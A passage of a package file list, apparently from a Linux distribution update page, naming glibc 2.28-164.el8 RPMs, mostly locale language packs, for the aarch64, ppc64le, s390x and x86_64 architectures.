nglibc-langpack-tpi-2.28-164.el8.aarch64.rpm\nglibc-langpack-tr-2.28-164.el8.aarch64.rpm\nglibc-langpack-ts-2.28-164.el8.aarch64.rpm\nglibc-langpack-tt-2.28-164.el8.aarch64.rpm\nglibc-langpack-ug-2.28-164.el8.aarch64.rpm\nglibc-langpack-uk-2.28-164.el8.aarch64.rpm\nglibc-langpack-unm-2.28-164.el8.aarch64.rpm\nglibc-langpack-ur-2.28-164.el8.aarch64.rpm\nglibc-langpack-uz-2.28-164.el8.aarch64.rpm\nglibc-langpack-ve-2.28-164.el8.aarch64.rpm\nglibc-langpack-vi-2.28-164.el8.aarch64.rpm\nglibc-langpack-wa-2.28-164.el8.aarch64.rpm\nglibc-langpack-wae-2.28-164.el8.aarch64.rpm\nglibc-langpack-wal-2.28-164.el8.aarch64.rpm\nglibc-langpack-wo-2.28-164.el8.aarch64.rpm\nglibc-langpack-xh-2.28-164.el8.aarch64.rpm\nglibc-langpack-yi-2.28-164.el8.aarch64.rpm\nglibc-langpack-yo-2.28-164.el8.aarch64.rpm\nglibc-langpack-yue-2.28-164.el8.aarch64.rpm\nglibc-langpack-yuw-2.28-164.el8.aarch64.rpm\nglibc-langpack-zh-2.28-164.el8.aarch64.rpm\nglibc-langpack-zu-2.28-164.el8.aarch64.rpm\nglibc-locale-source-2.28-164.el8.aarch64.rpm\nglibc-minimal-langpack-2.28-164.el8.aarch64.rpm\nlibnsl-2.28-164.el8.aarch64.rpm\nnscd-2.28-164.el8.aarch64.rpm\nnss_db-2.28-164.el8.aarch64.rpm\n\nppc64le:\nglibc-2.28-164.el8.ppc64le.rpm\nglibc-all-langpacks-2.28-164.el8.ppc64le.rpm\nglibc-common-2.28-164.el8.ppc64le.rpm\nglibc-debuginfo-2.28-164.el8.ppc64le.rpm\nglibc-debuginfo-common-2.28-164.el8.ppc64le.rpm\nglibc-devel-2.28-164.el8.ppc64le.rpm\nglibc-headers-2.28-164.el8.ppc64le.rpm\nglibc-langpack-aa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-af-2.28-164.el8.ppc64le.rpm\nglibc-langpack-agr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ak-2.28-164.el8.ppc64le.rpm\nglibc-langpack-am-2.28-164.el8.ppc64le.rpm\nglibc-langpack-an-2.28-164.el8.ppc64le.rpm\nglibc-langpack-anp-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ar-2.28-164.el8.ppc64le.rpm\nglibc-langpack-as-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ast-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ayc-2.28-164.el8.ppc64le.rpm\nglibc-langpack-az-2.28-164.el8.ppc64le.rpm\ngli
bc-langpack-be-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bem-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ber-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bg-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bhb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bho-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-br-2.28-164.el8.ppc64le.rpm\nglibc-langpack-brx-2.28-164.el8.ppc64le.rpm\nglibc-langpack-bs-2.28-164.el8.ppc64le.rpm\nglibc-langpack-byn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ca-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ce-2.28-164.el8.ppc64le.rpm\nglibc-langpack-chr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-cmn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-crh-2.28-164.el8.ppc64le.rpm\nglibc-langpack-cs-2.28-164.el8.ppc64le.rpm\nglibc-langpack-csb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-cv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-cy-2.28-164.el8.ppc64le.rpm\nglibc-langpack-da-2.28-164.el8.ppc64le.rpm\nglibc-langpack-de-2.28-164.el8.ppc64le.rpm\nglibc-langpack-doi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-dsb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-dv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-dz-2.28-164.el8.ppc64le.rpm\nglibc-langpack-el-2.28-164.el8.ppc64le.rpm\nglibc-langpack-en-2.28-164.el8.ppc64le.rpm\nglibc-langpack-eo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-es-2.28-164.el8.ppc64le.rpm\nglibc-langpack-et-2.28-164.el8.ppc64le.rpm\nglibc-langpack-eu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ff-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fil-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fur-2.28-164.el8.ppc64le.rpm\nglibc-langpack-fy-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ga-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gd-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gez-2.28-164.el8.ppc64le.rpm\nglibc-la
ngpack-gl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-gv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ha-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hak-2.28-164.el8.ppc64le.rpm\nglibc-langpack-he-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hif-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hne-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hsb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ht-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-hy-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ia-2.28-164.el8.ppc64le.rpm\nglibc-langpack-id-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ig-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ik-2.28-164.el8.ppc64le.rpm\nglibc-langpack-is-2.28-164.el8.ppc64le.rpm\nglibc-langpack-it-2.28-164.el8.ppc64le.rpm\nglibc-langpack-iu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ja-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ka-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kab-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-km-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ko-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kok-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ks-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ku-2.28-164.el8.ppc64le.rpm\nglibc-langpack-kw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ky-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lg-2.28-164.el8.ppc64le.rpm\nglibc-langpack-li-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lij-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ln-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lt-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-lzh-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mag-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mai-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mfe
-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mg-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mhr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-miq-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mjw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ml-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mni-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ms-2.28-164.el8.ppc64le.rpm\nglibc-langpack-mt-2.28-164.el8.ppc64le.rpm\nglibc-langpack-my-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nan-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nb-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nds-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ne-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nhn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-niu-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-nso-2.28-164.el8.ppc64le.rpm\nglibc-langpack-oc-2.28-164.el8.ppc64le.rpm\nglibc-langpack-om-2.28-164.el8.ppc64le.rpm\nglibc-langpack-or-2.28-164.el8.ppc64le.rpm\nglibc-langpack-os-2.28-164.el8.ppc64le.rpm\nglibc-langpack-pa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-pap-2.28-164.el8.ppc64le.rpm\nglibc-langpack-pl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ps-2.28-164.el8.ppc64le.rpm\nglibc-langpack-pt-2.28-164.el8.ppc64le.rpm\nglibc-langpack-quz-2.28-164.el8.ppc64le.rpm\nglibc-langpack-raj-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ro-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ru-2.28-164.el8.ppc64le.rpm\nglibc-langpack-rw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sah-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sat-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sc-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sd-2.28-164.el8.ppc64le.rpm\nglibc-langpack-se-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sgs-2.28-164.el8.ppc64le.rpm\nglibc-langpack-shn-2.2
8-164.el8.ppc64le.rpm\nglibc-langpack-shs-2.28-164.el8.ppc64le.rpm\nglibc-langpack-si-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sid-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sm-2.28-164.el8.ppc64le.rpm\nglibc-langpack-so-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sq-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ss-2.28-164.el8.ppc64le.rpm\nglibc-langpack-st-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sv-2.28-164.el8.ppc64le.rpm\nglibc-langpack-sw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-szl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ta-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tcy-2.28-164.el8.ppc64le.rpm\nglibc-langpack-te-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tg-2.28-164.el8.ppc64le.rpm\nglibc-langpack-th-2.28-164.el8.ppc64le.rpm\nglibc-langpack-the-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ti-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tig-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tl-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tn-2.28-164.el8.ppc64le.rpm\nglibc-langpack-to-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tpi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tr-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ts-2.28-164.el8.ppc64le.rpm\nglibc-langpack-tt-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ug-2.28-164.el8.ppc64le.rpm\nglibc-langpack-uk-2.28-164.el8.ppc64le.rpm\nglibc-langpack-unm-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ur-2.28-164.el8.ppc64le.rpm\nglibc-langpack-uz-2.28-164.el8.ppc64le.rpm\nglibc-langpack-ve-2.28-164.el8.ppc64le.rpm\nglibc-langpack-vi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-wa-2.28-164.el8.ppc64le.rpm\nglibc-langpack-wae-2.28-164.el8.ppc64le.rpm\nglibc-langpack-wal-2.28-164.el8.ppc64le.rpm\nglibc-langpack-wo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-xh-2.28-164.el8.ppc64le.rpm\nglibc-langpack-yi-2.28-164.el8.ppc64le.rpm\nglibc-langpack-yo-2.28-164.el8.ppc64le.rpm\nglibc-langpack-yue-2.28-164.el8
.ppc64le.rpm\nglibc-langpack-yuw-2.28-164.el8.ppc64le.rpm\nglibc-langpack-zh-2.28-164.el8.ppc64le.rpm\nglibc-langpack-zu-2.28-164.el8.ppc64le.rpm\nglibc-locale-source-2.28-164.el8.ppc64le.rpm\nglibc-minimal-langpack-2.28-164.el8.ppc64le.rpm\nlibnsl-2.28-164.el8.ppc64le.rpm\nnscd-2.28-164.el8.ppc64le.rpm\nnss_db-2.28-164.el8.ppc64le.rpm\n\ns390x:\nglibc-2.28-164.el8.s390x.rpm\nglibc-all-langpacks-2.28-164.el8.s390x.rpm\nglibc-common-2.28-164.el8.s390x.rpm\nglibc-debuginfo-2.28-164.el8.s390x.rpm\nglibc-debuginfo-common-2.28-164.el8.s390x.rpm\nglibc-devel-2.28-164.el8.s390x.rpm\nglibc-headers-2.28-164.el8.s390x.rpm\nglibc-langpack-aa-2.28-164.el8.s390x.rpm\nglibc-langpack-af-2.28-164.el8.s390x.rpm\nglibc-langpack-agr-2.28-164.el8.s390x.rpm\nglibc-langpack-ak-2.28-164.el8.s390x.rpm\nglibc-langpack-am-2.28-164.el8.s390x.rpm\nglibc-langpack-an-2.28-164.el8.s390x.rpm\nglibc-langpack-anp-2.28-164.el8.s390x.rpm\nglibc-langpack-ar-2.28-164.el8.s390x.rpm\nglibc-langpack-as-2.28-164.el8.s390x.rpm\nglibc-langpack-ast-2.28-164.el8.s390x.rpm\nglibc-langpack-ayc-2.28-164.el8.s390x.rpm\nglibc-langpack-az-2.28-164.el8.s390x.rpm\nglibc-langpack-be-2.28-164.el8.s390x.rpm\nglibc-langpack-bem-2.28-164.el8.s390x.rpm\nglibc-langpack-ber-2.28-164.el8.s390x.rpm\nglibc-langpack-bg-2.28-164.el8.s390x.rpm\nglibc-langpack-bhb-2.28-164.el8.s390x.rpm\nglibc-langpack-bho-2.28-164.el8.s390x.rpm\nglibc-langpack-bi-2.28-164.el8.s390x.rpm\nglibc-langpack-bn-2.28-164.el8.s390x.rpm\nglibc-langpack-bo-2.28-164.el8.s390x.rpm\nglibc-langpack-br-2.28-164.el8.s390x.rpm\nglibc-langpack-brx-2.28-164.el8.s390x.rpm\nglibc-langpack-bs-2.28-164.el8.s390x.rpm\nglibc-langpack-byn-2.28-164.el8.s390x.rpm\nglibc-langpack-ca-2.28-164.el8.s390x.rpm\nglibc-langpack-ce-2.28-164.el8.s390x.rpm\nglibc-langpack-chr-2.28-164.el8.s390x.rpm\nglibc-langpack-cmn-2.28-164.el8.s390x.rpm\nglibc-langpack-crh-2.28-164.el8.s390x.rpm\nglibc-langpack-cs-2.28-164.el8.s390x.rpm\nglibc-langpack-csb-2.28-164.el8.s390x.rpm\nglibc-langpack-cv-2.2
8-164.el8.s390x.rpm\nglibc-langpack-cy-2.28-164.el8.s390x.rpm\nglibc-langpack-da-2.28-164.el8.s390x.rpm\nglibc-langpack-de-2.28-164.el8.s390x.rpm\nglibc-langpack-doi-2.28-164.el8.s390x.rpm\nglibc-langpack-dsb-2.28-164.el8.s390x.rpm\nglibc-langpack-dv-2.28-164.el8.s390x.rpm\nglibc-langpack-dz-2.28-164.el8.s390x.rpm\nglibc-langpack-el-2.28-164.el8.s390x.rpm\nglibc-langpack-en-2.28-164.el8.s390x.rpm\nglibc-langpack-eo-2.28-164.el8.s390x.rpm\nglibc-langpack-es-2.28-164.el8.s390x.rpm\nglibc-langpack-et-2.28-164.el8.s390x.rpm\nglibc-langpack-eu-2.28-164.el8.s390x.rpm\nglibc-langpack-fa-2.28-164.el8.s390x.rpm\nglibc-langpack-ff-2.28-164.el8.s390x.rpm\nglibc-langpack-fi-2.28-164.el8.s390x.rpm\nglibc-langpack-fil-2.28-164.el8.s390x.rpm\nglibc-langpack-fo-2.28-164.el8.s390x.rpm\nglibc-langpack-fr-2.28-164.el8.s390x.rpm\nglibc-langpack-fur-2.28-164.el8.s390x.rpm\nglibc-langpack-fy-2.28-164.el8.s390x.rpm\nglibc-langpack-ga-2.28-164.el8.s390x.rpm\nglibc-langpack-gd-2.28-164.el8.s390x.rpm\nglibc-langpack-gez-2.28-164.el8.s390x.rpm\nglibc-langpack-gl-2.28-164.el8.s390x.rpm\nglibc-langpack-gu-2.28-164.el8.s390x.rpm\nglibc-langpack-gv-2.28-164.el8.s390x.rpm\nglibc-langpack-ha-2.28-164.el8.s390x.rpm\nglibc-langpack-hak-2.28-164.el8.s390x.rpm\nglibc-langpack-he-2.28-164.el8.s390x.rpm\nglibc-langpack-hi-2.28-164.el8.s390x.rpm\nglibc-langpack-hif-2.28-164.el8.s390x.rpm\nglibc-langpack-hne-2.28-164.el8.s390x.rpm\nglibc-langpack-hr-2.28-164.el8.s390x.rpm\nglibc-langpack-hsb-2.28-164.el8.s390x.rpm\nglibc-langpack-ht-2.28-164.el8.s390x.rpm\nglibc-langpack-hu-2.28-164.el8.s390x.rpm\nglibc-langpack-hy-2.28-164.el8.s390x.rpm\nglibc-langpack-ia-2.28-164.el8.s390x.rpm\nglibc-langpack-id-2.28-164.el8.s390x.rpm\nglibc-langpack-ig-2.28-164.el8.s390x.rpm\nglibc-langpack-ik-2.28-164.el8.s390x.rpm\nglibc-langpack-is-2.28-164.el8.s390x.rpm\nglibc-langpack-it-2.28-164.el8.s390x.rpm\nglibc-langpack-iu-2.28-164.el8.s390x.rpm\nglibc-langpack-ja-2.28-164.el8.s390x.rpm\nglibc-langpack-ka-2.28-164.el8.s390x.r
pm\nglibc-langpack-kab-2.28-164.el8.s390x.rpm\nglibc-langpack-kk-2.28-164.el8.s390x.rpm\nglibc-langpack-kl-2.28-164.el8.s390x.rpm\nglibc-langpack-km-2.28-164.el8.s390x.rpm\nglibc-langpack-kn-2.28-164.el8.s390x.rpm\nglibc-langpack-ko-2.28-164.el8.s390x.rpm\nglibc-langpack-kok-2.28-164.el8.s390x.rpm\nglibc-langpack-ks-2.28-164.el8.s390x.rpm\nglibc-langpack-ku-2.28-164.el8.s390x.rpm\nglibc-langpack-kw-2.28-164.el8.s390x.rpm\nglibc-langpack-ky-2.28-164.el8.s390x.rpm\nglibc-langpack-lb-2.28-164.el8.s390x.rpm\nglibc-langpack-lg-2.28-164.el8.s390x.rpm\nglibc-langpack-li-2.28-164.el8.s390x.rpm\nglibc-langpack-lij-2.28-164.el8.s390x.rpm\nglibc-langpack-ln-2.28-164.el8.s390x.rpm\nglibc-langpack-lo-2.28-164.el8.s390x.rpm\nglibc-langpack-lt-2.28-164.el8.s390x.rpm\nglibc-langpack-lv-2.28-164.el8.s390x.rpm\nglibc-langpack-lzh-2.28-164.el8.s390x.rpm\nglibc-langpack-mag-2.28-164.el8.s390x.rpm\nglibc-langpack-mai-2.28-164.el8.s390x.rpm\nglibc-langpack-mfe-2.28-164.el8.s390x.rpm\nglibc-langpack-mg-2.28-164.el8.s390x.rpm\nglibc-langpack-mhr-2.28-164.el8.s390x.rpm\nglibc-langpack-mi-2.28-164.el8.s390x.rpm\nglibc-langpack-miq-2.28-164.el8.s390x.rpm\nglibc-langpack-mjw-2.28-164.el8.s390x.rpm\nglibc-langpack-mk-2.28-164.el8.s390x.rpm\nglibc-langpack-ml-2.28-164.el8.s390x.rpm\nglibc-langpack-mn-2.28-164.el8.s390x.rpm\nglibc-langpack-mni-2.28-164.el8.s390x.rpm\nglibc-langpack-mr-2.28-164.el8.s390x.rpm\nglibc-langpack-ms-2.28-164.el8.s390x.rpm\nglibc-langpack-mt-2.28-164.el8.s390x.rpm\nglibc-langpack-my-2.28-164.el8.s390x.rpm\nglibc-langpack-nan-2.28-164.el8.s390x.rpm\nglibc-langpack-nb-2.28-164.el8.s390x.rpm\nglibc-langpack-nds-2.28-164.el8.s390x.rpm\nglibc-langpack-ne-2.28-164.el8.s390x.rpm\nglibc-langpack-nhn-2.28-164.el8.s390x.rpm\nglibc-langpack-niu-2.28-164.el8.s390x.rpm\nglibc-langpack-nl-2.28-164.el8.s390x.rpm\nglibc-langpack-nn-2.28-164.el8.s390x.rpm\nglibc-langpack-nr-2.28-164.el8.s390x.rpm\nglibc-langpack-nso-2.28-164.el8.s390x.rpm\nglibc-langpack-oc-2.28-164.el8.s390x.rpm\nglibc-
langpack-om-2.28-164.el8.s390x.rpm\nglibc-langpack-or-2.28-164.el8.s390x.rpm\nglibc-langpack-os-2.28-164.el8.s390x.rpm\nglibc-langpack-pa-2.28-164.el8.s390x.rpm\nglibc-langpack-pap-2.28-164.el8.s390x.rpm\nglibc-langpack-pl-2.28-164.el8.s390x.rpm\nglibc-langpack-ps-2.28-164.el8.s390x.rpm\nglibc-langpack-pt-2.28-164.el8.s390x.rpm\nglibc-langpack-quz-2.28-164.el8.s390x.rpm\nglibc-langpack-raj-2.28-164.el8.s390x.rpm\nglibc-langpack-ro-2.28-164.el8.s390x.rpm\nglibc-langpack-ru-2.28-164.el8.s390x.rpm\nglibc-langpack-rw-2.28-164.el8.s390x.rpm\nglibc-langpack-sa-2.28-164.el8.s390x.rpm\nglibc-langpack-sah-2.28-164.el8.s390x.rpm\nglibc-langpack-sat-2.28-164.el8.s390x.rpm\nglibc-langpack-sc-2.28-164.el8.s390x.rpm\nglibc-langpack-sd-2.28-164.el8.s390x.rpm\nglibc-langpack-se-2.28-164.el8.s390x.rpm\nglibc-langpack-sgs-2.28-164.el8.s390x.rpm\nglibc-langpack-shn-2.28-164.el8.s390x.rpm\nglibc-langpack-shs-2.28-164.el8.s390x.rpm\nglibc-langpack-si-2.28-164.el8.s390x.rpm\nglibc-langpack-sid-2.28-164.el8.s390x.rpm\nglibc-langpack-sk-2.28-164.el8.s390x.rpm\nglibc-langpack-sl-2.28-164.el8.s390x.rpm\nglibc-langpack-sm-2.28-164.el8.s390x.rpm\nglibc-langpack-so-2.28-164.el8.s390x.rpm\nglibc-langpack-sq-2.28-164.el8.s390x.rpm\nglibc-langpack-sr-2.28-164.el8.s390x.rpm\nglibc-langpack-ss-2.28-164.el8.s390x.rpm\nglibc-langpack-st-2.28-164.el8.s390x.rpm\nglibc-langpack-sv-2.28-164.el8.s390x.rpm\nglibc-langpack-sw-2.28-164.el8.s390x.rpm\nglibc-langpack-szl-2.28-164.el8.s390x.rpm\nglibc-langpack-ta-2.28-164.el8.s390x.rpm\nglibc-langpack-tcy-2.28-164.el8.s390x.rpm\nglibc-langpack-te-2.28-164.el8.s390x.rpm\nglibc-langpack-tg-2.28-164.el8.s390x.rpm\nglibc-langpack-th-2.28-164.el8.s390x.rpm\nglibc-langpack-the-2.28-164.el8.s390x.rpm\nglibc-langpack-ti-2.28-164.el8.s390x.rpm\nglibc-langpack-tig-2.28-164.el8.s390x.rpm\nglibc-langpack-tk-2.28-164.el8.s390x.rpm\nglibc-langpack-tl-2.28-164.el8.s390x.rpm\nglibc-langpack-tn-2.28-164.el8.s390x.rpm\nglibc-langpack-to-2.28-164.el8.s390x.rpm\nglibc-langpack-tpi-
2.28-164.el8.s390x.rpm\nglibc-langpack-tr-2.28-164.el8.s390x.rpm\nglibc-langpack-ts-2.28-164.el8.s390x.rpm\nglibc-langpack-tt-2.28-164.el8.s390x.rpm\nglibc-langpack-ug-2.28-164.el8.s390x.rpm\nglibc-langpack-uk-2.28-164.el8.s390x.rpm\nglibc-langpack-unm-2.28-164.el8.s390x.rpm\nglibc-langpack-ur-2.28-164.el8.s390x.rpm\nglibc-langpack-uz-2.28-164.el8.s390x.rpm\nglibc-langpack-ve-2.28-164.el8.s390x.rpm\nglibc-langpack-vi-2.28-164.el8.s390x.rpm\nglibc-langpack-wa-2.28-164.el8.s390x.rpm\nglibc-langpack-wae-2.28-164.el8.s390x.rpm\nglibc-langpack-wal-2.28-164.el8.s390x.rpm\nglibc-langpack-wo-2.28-164.el8.s390x.rpm\nglibc-langpack-xh-2.28-164.el8.s390x.rpm\nglibc-langpack-yi-2.28-164.el8.s390x.rpm\nglibc-langpack-yo-2.28-164.el8.s390x.rpm\nglibc-langpack-yue-2.28-164.el8.s390x.rpm\nglibc-langpack-yuw-2.28-164.el8.s390x.rpm\nglibc-langpack-zh-2.28-164.el8.s390x.rpm\nglibc-langpack-zu-2.28-164.el8.s390x.rpm\nglibc-locale-source-2.28-164.el8.s390x.rpm\nglibc-minimal-langpack-2.28-164.el8.s390x.rpm\nlibnsl-2.28-164.el8.s390x.rpm\nnscd-2.28-164.el8.s390x.rpm\nnss_db-2.28-164.el8.s390x.rpm\n\nx86_64:\nglibc-2.28-164.el8.i686.rpm\nglibc-2.28-164.el8.x86_64.rpm\nglibc-all-langpacks-2.28-164.el8.x86_64.rpm\nglibc-common-2.28-164.el8.x86_64.rpm\nglibc-debuginfo-2.28-164.el8.i686.rpm\nglibc-debuginfo-2.28-164.el8.x86_64.rpm\nglibc-debuginfo-common-2.28-164.el8.i686.rpm\nglibc-debuginfo-common-2.28-164.el8.x86_64.rpm\nglibc-devel-2.28-164.el8.i686.rpm\nglibc-devel-2.28-164.el8.x86_64.rpm\nglibc-headers-2.28-164.el8.i686.rpm\nglibc-headers-2.28-164.el8.x86_64.rpm\nglibc-langpack-aa-2.28-164.el8.x86_64.rpm\nglibc-langpack-af-2.28-164.el8.x86_64.rpm\nglibc-langpack-agr-2.28-164.el8.x86_64.rpm\nglibc-langpack-ak-2.28-164.el8.x86_64.rpm\nglibc-langpack-am-2.28-164.el8.x86_64.rpm\nglibc-langpack-an-2.28-164.el8.x86_64.rpm\nglibc-langpack-anp-2.28-164.el8.x86_64.rpm\nglibc-langpack-ar-2.28-164.el8.x86_64.rpm\nglibc-langpack-as-2.28-164.el8.x86_64.rpm\nglibc-langpack-ast-2.28-164.el8.x86_64.rpm
\nglibc-langpack-ayc-2.28-164.el8.x86_64.rpm\nglibc-langpack-az-2.28-164.el8.x86_64.rpm\nglibc-langpack-be-2.28-164.el8.x86_64.rpm\nglibc-langpack-bem-2.28-164.el8.x86_64.rpm\nglibc-langpack-ber-2.28-164.el8.x86_64.rpm\nglibc-langpack-bg-2.28-164.el8.x86_64.rpm\nglibc-langpack-bhb-2.28-164.el8.x86_64.rpm\nglibc-langpack-bho-2.28-164.el8.x86_64.rpm\nglibc-langpack-bi-2.28-164.el8.x86_64.rpm\nglibc-langpack-bn-2.28-164.el8.x86_64.rpm\nglibc-langpack-bo-2.28-164.el8.x86_64.rpm\nglibc-langpack-br-2.28-164.el8.x86_64.rpm\nglibc-langpack-brx-2.28-164.el8.x86_64.rpm\nglibc-langpack-bs-2.28-164.el8.x86_64.rpm\nglibc-langpack-byn-2.28-164.el8.x86_64.rpm\nglibc-langpack-ca-2.28-164.el8.x86_64.rpm\nglibc-langpack-ce-2.28-164.el8.x86_64.rpm\nglibc-langpack-chr-2.28-164.el8.x86_64.rpm\nglibc-langpack-cmn-2.28-164.el8.x86_64.rpm\nglibc-langpack-crh-2.28-164.el8.x86_64.rpm\nglibc-langpack-cs-2.28-164.el8.x86_64.rpm\nglibc-langpack-csb-2.28-164.el8.x86_64.rpm\nglibc-langpack-cv-2.28-164.el8.x86_64.rpm\nglibc-langpack-cy-2.28-164.el8.x86_64.rpm\nglibc-langpack-da-2.28-164.el8.x86_64.rpm\nglibc-langpack-de-2.28-164.el8.x86_64.rpm\nglibc-langpack-doi-2.28-164.el8.x86_64.rpm\nglibc-langpack-dsb-2.28-164.el8.x86_64.rpm\nglibc-langpack-dv-2.28-164.el8.x86_64.rpm\nglibc-langpack-dz-2.28-164.el8.x86_64.rpm\nglibc-langpack-el-2.28-164.el8.x86_64.rpm\nglibc-langpack-en-2.28-164.el8.x86_64.rpm\nglibc-langpack-eo-2.28-164.el8.x86_64.rpm\nglibc-langpack-es-2.28-164.el8.x86_64.rpm\nglibc-langpack-et-2.28-164.el8.x86_64.rpm\nglibc-langpack-eu-2.28-164.el8.x86_64.rpm\nglibc-langpack-fa-2.28-164.el8.x86_64.rpm\nglibc-langpack-ff-2.28-164.el8.x86_64.rpm\nglibc-langpack-fi-2.28-164.el8.x86_64.rpm\nglibc-langpack-fil-2.28-164.el8.x